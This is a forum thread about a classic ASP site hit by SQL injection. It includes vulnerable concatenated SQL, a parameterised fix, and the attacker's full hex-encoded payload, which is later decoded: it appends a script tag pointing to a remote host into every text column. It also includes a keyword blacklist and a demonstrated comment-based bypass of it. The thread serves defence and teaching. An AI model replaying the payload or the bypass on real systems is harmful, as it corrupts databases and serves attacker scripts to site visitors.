rito1 asked:

Stored Procedures Prevent Injection Attacks?

Hi All

A website of ours has recently been hit by an injection attack which is corrupting our data within the following line <script src=http://www.dota11 .cn / m.js></script> (added spaces to prevent anyone from clicking it by mistake!)

I have been going through my weblogs and have located where they have tried to perform the attack... Obviously one of our files is vulnerable, but inspecting the majority of these files, they actually trigger a stored procedure rather than using inline code.

Please could anyone confirm that I should be looking for inline code instances and am safe to leave the stored-procedure-referencing pages as they are?

Is there a cool gadget that can test for vulnerabilities on certain pages or is it more of a painstaking job?

Many thanks,

Rit
rito1 (ASKER):

Hi,

I am dealing with an ASP written site which is quite dated now.

Here is an example of the way in which it executes a stored procedure... can you see any vulnerabilities in this?...

Many thanks

Rit

Function GetConnection()
      Dim objConn
      Set objConn = Server.CreateObject("ADODB.Connection")
      objConn.Open strDSNless
      Set GetConnection = objConn
End Function

Function GetRecordset(sSQL)
      Dim objConn
'      Response.Write(sSQL & "<br>")
'      Response.Flush
      Set objConn = GetConnection()
      Set GetRecordset = objConn.Execute(sSQL)
      Set objConn = Nothing
End Function

Dim newsID
newsID = Request.QueryString("newsid")

strSQL = "EXECUTE GetNewsItem " & newsID
Set objRS = GetRecordset(strSQL)

the stored procedure for this example looks like this...

CREATE PROCEDURE dbo.GetNewsItem
      @NewsID int
AS
      SELECT
            N.*,
            B.BaseCount,
            E.EmbeddedCount
      FROM
            NewsItems AS N
            LEFT OUTER JOIN
            (
                  SELECT
                        NewsID,
                        COUNT(*) AS BaseCount
                  FROM
                        NewsImages
                  WHERE
                        NewsID = @NewsID AND
                        Embedded = 0
                  GROUP BY
                        NewsID
            ) AS B ON N.NewsID = B.NewsID
            LEFT OUTER JOIN
            (
                  SELECT
                        NewsID,
                        COUNT(*) AS EmbeddedCount
                  FROM
                        NewsImages
                  WHERE
                        NewsID = @NewsID AND
                        Embedded = 1
                  GROUP BY
                        NewsID
            ) AS E ON N.NewsID = E.NewsID
      WHERE
            N.NewsID = @NewsID

GO
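The call above is still string concatenation: "EXECUTE GetNewsItem " & newsID puts whatever arrived in the newsid query parameter straight into the batch text, and objConn.Execute sends that text to SQL Server, so the stored procedure gives no protection at all. Anything after the number is parsed as further statements (450;DECLARE @S ... ;EXEC(@S); runs as a batch here; the quoted 450'; form from the logged request would only fail on this particular page because the unclosed quote is a syntax error, not because the page is safe). The following is an added example, not code from the thread, showing the two fixes a reviewer would ask for on this page: accept only digits for newsid before anything else happens, and pass the value to dbo.GetNewsItem as a typed ADO parameter through ADODB.Command so it never becomes part of the SQL text. It reuses strDSNless from the post; the names IsValidNewsID and GetNewsItemRS are mine, and the ADO constant values are the standard ones from adovbs.inc.

```vbscript
' Added example (not from the original post): the news page with newsid
' validated and bound as a typed parameter instead of concatenated into SQL.

' Standard ADO constants (adovbs.inc values); classic ASP does not define them.
Const adCmdStoredProc = 4
Const adInteger = 3
Const adParamInput = 1

' Accept known good: a news id is one to nine digits and nothing else.
' Quotes, semicolons and keywords are rejected before SQL is involved at all.
Function IsValidNewsID(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsValidNewsID = re.Test(value)
End Function

' Calls dbo.GetNewsItem with @NewsID bound as an integer parameter. ADO issues
' the call as an RPC with a typed argument, so the value is never SQL text;
' CLng also raises a type mismatch on anything that is not a number.
' strDSNless is assumed to be the connection string from the post's include.
Function GetNewsItemRS(newsID)
    Dim objConn, objCmd
    Set objConn = Server.CreateObject("ADODB.Connection")
    objConn.Open strDSNless
    Set objCmd = Server.CreateObject("ADODB.Command")
    Set objCmd.ActiveConnection = objConn
    objCmd.CommandType = adCmdStoredProc
    objCmd.CommandText = "dbo.GetNewsItem"
    objCmd.Parameters.Append objCmd.CreateParameter("@NewsID", adInteger, adParamInput, 4, CLng(newsID))
    Set GetNewsItemRS = objCmd.Execute
End Function

Dim newsID, objRS
newsID = Request.QueryString("newsid")
If Not IsValidNewsID(newsID) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid news id."
    Response.End
End If
Set objRS = GetNewsItemRS(newsID)
```

The same pattern applies to every page that builds an EXECUTE or SELECT string with & from Request values: the stored procedure only helps once the arguments travel as parameters rather than as text. Pages that still concatenate, such as the show_image.asp request in the logs, are the ones to look for.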
ASKER CERTIFIED SOLUTION
dosth
This solution is only available to members.
rito1 (ASKER):

Hi dosth,

Thanks very much. My VB is a little poor... could you briefly explain what your code does?

Would it stop the following request?

show_image.asp?imageid=2954&newsid=450';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0064006F0074006100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F00530045002000540061 0062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
SOLUTION
This solution is only available to members.
Yes, it will. You see, I have added this EXEC(; I added all DDL commands and a few DML commands to exclude,

so anything that comes in the query string will not get through.
sqlArray = "select%20|delete%20|update%20|insert%20|create%20|alter%20|drop%20|truncate%20|sp_|declare%20|exec("
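An added example, not code from either poster, that does two things with the material above: it decodes the CAST(0x... AS NVARCHAR(4000)) value from the logged request, which is simply the UTF-16LE byte encoding of a T-SQL batch, and it runs the sqlArray blacklist as posted over that request and over a copy in which the same SQL is spelled slightly differently. Decoded, the batch declares a cursor over sysobjects/syscolumns for every text, ntext, nvarchar and varchar column (xtype 99, 35, 231, 167) of every user table and runs update [table] set [column]=rtrim(convert(varchar,[column]))+'<script src=http://www.dota11.cn/m.js></script>' against each one, which is exactly the corruption described in the question. The thread does not show how the pattern is applied; the assumption here is that it is split on | and matched case-insensitively with InStr against the raw, still URL-encoded query string, since that is the only way the literal %20 entries can match. Run it with cscript.

```vbscript
' Added example (not from the thread). Decodes the injected batch from the
' logged request and checks dosth's blacklist against two spellings of it.
Option Explicit

' The 0x... value from the logged request, split into lines for readability.
Dim hexPayload
hexPayload = _
    "4400450043004C004100520045002000400054002000" & _
    "7600610072006300680061007200280032003500350029002C00400043002000" & _
    "7600610072006300680061007200280032003500350029002000" & _
    "4400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000" & _
    "43005500520053004F005200200046004F0052002000730065006C006500630074002000" & _
    "61002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D002000" & _
    "7300790073006F0062006A006500630074007300200061002C00" & _
    "73007900730063006F006C0075006D006E007300200062002000770068006500720065002000" & _
    "61002E00690064003D0062002E0069006400200061006E0064002000" & _
    "61002E00780074007900700065003D00270075002700200061006E0064002000" & _
    "280062002E00780074007900700065003D00390039002000" & _
    "6F007200200062002E00780074007900700065003D00330035002000" & _
    "6F007200200062002E00780074007900700065003D003200330031002000" & _
    "6F007200200062002E00780074007900700065003D0031003600370029002000" & _
    "4F00500045004E0020005400610062006C0065005F0043007500720073006F0072002000" & _
    "4600450054004300480020004E004500580054002000460052004F004D0020002000" & _
    "5400610062006C0065005F0043007500720073006F007200200049004E0054004F002000" & _
    "400054002C00400043002000" & _
    "5700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300029002000" & _
    "42004500470049004E002000650078006500630028002700" & _
    "75007000640061007400650020005B0027002B00400054002B0027005D002000" & _
    "73006500740020005B0027002B00400043002B0027005D003D00" & _
    "72007400720069006D00280063006F006E0076006500720074002800" & _
    "76006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B0027002700" & _
    "3C0073006300720069007000740020007300720063003D00" & _
    "68007400740070003A002F002F007700770077002E0064006F0074006100310031002E0063006E002F006D002E006A007300" & _
    "3E003C002F007300630072006900700074003E002700270027002900" & _
    "4600450054004300480020004E004500580054002000460052004F004D0020002000" & _
    "5400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002000" & _
    "45004E004400200043004C004F00530045002000" & _
    "5400610062006C0065005F0043007500720073006F0072002000" & _
    "4400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200"

' NVARCHAR is UTF-16LE: each character is two bytes, low byte first.
Function DecodeUtf16LEHex(h)
    Dim i, lo, hi, s
    s = ""
    For i = 1 To Len(h) - 3 Step 4
        lo = CLng("&H" & Mid(h, i, 2))
        hi = CLng("&H" & Mid(h, i + 2, 2))
        s = s & ChrW(hi * 256 + lo)
    Next
    DecodeUtf16LEHex = s
End Function

' dosth's sqlArray as posted; assumed to be split on "|" and tested with a
' case-insensitive InStr against the raw, URL-encoded query string.
Function MatchesBlacklist(queryString)
    Dim sqlArray, token
    sqlArray = Split("select%20|delete%20|update%20|insert%20|create%20|alter%20|drop%20|truncate%20|sp_|declare%20|exec(", "|")
    MatchesBlacklist = False
    For Each token In sqlArray
        If InStr(1, queryString, token, vbTextCompare) > 0 Then MatchesBlacklist = True
    Next
End Function

Dim logged, rewritten
' The query string exactly as it appears in the logged request.
logged = "imageid=2954&newsid=450';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" & _
         hexPayload & "%20AS%20NVARCHAR(4000));EXEC(@S);"
' Same batch to SQL Server: a /**/ comment stands in for the space after DECLARE
' and a space is inserted before the EXEC parenthesis.
rewritten = "imageid=2954&newsid=450';DECLARE/**/@S%20NVARCHAR(4000);SET%20@S=CAST(0x" & _
            hexPayload & "%20AS%20NVARCHAR(4000));EXEC%20(@S);"

WScript.Echo "Decoded batch:" & vbCrLf & DecodeUtf16LEHex(hexPayload) & vbCrLf
WScript.Echo "Blacklist catches logged request:    " & MatchesBlacklist(logged)
WScript.Echo "Blacklist catches rewritten request: " & MatchesBlacklist(rewritten)
```

The first check fires on DECLARE%20 and EXEC(; the second does not, because DECLARE/**/@S and EXEC (@S) contain neither token, yet SQL Server parses both batches identically. That is the limit of denying known bad: the list has to anticipate every spelling an attacker might use, whereas accepting only digits for newsid rejects both requests without any list.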
rito1 (ASKER):

Excellent, thanks both.
Thanks for the points.
Likewise, thanks for the grade.

Sorry @dosth, hope you didn't think that I was attacking your solution, I wasn't. I was just trying to offer an alternative viewpoint, something that I believe is referred to as "accept known good". I'm sure your solution does the job, I wasn't doubting that for a moment. I was just trying to point out that this approach of denying input that is regarded as "bad", rather than only allowing input that is regarded as "good" (i.e. only digits in number fields), holds a greater potential to fall foul of new exploits as they become available.

There is some very interesting reading for us all on the following site:

http://www.owasp.org/index.php/Top_10_2007
I agree; my solution is good to stop the attack immediately until we figure out the best approach.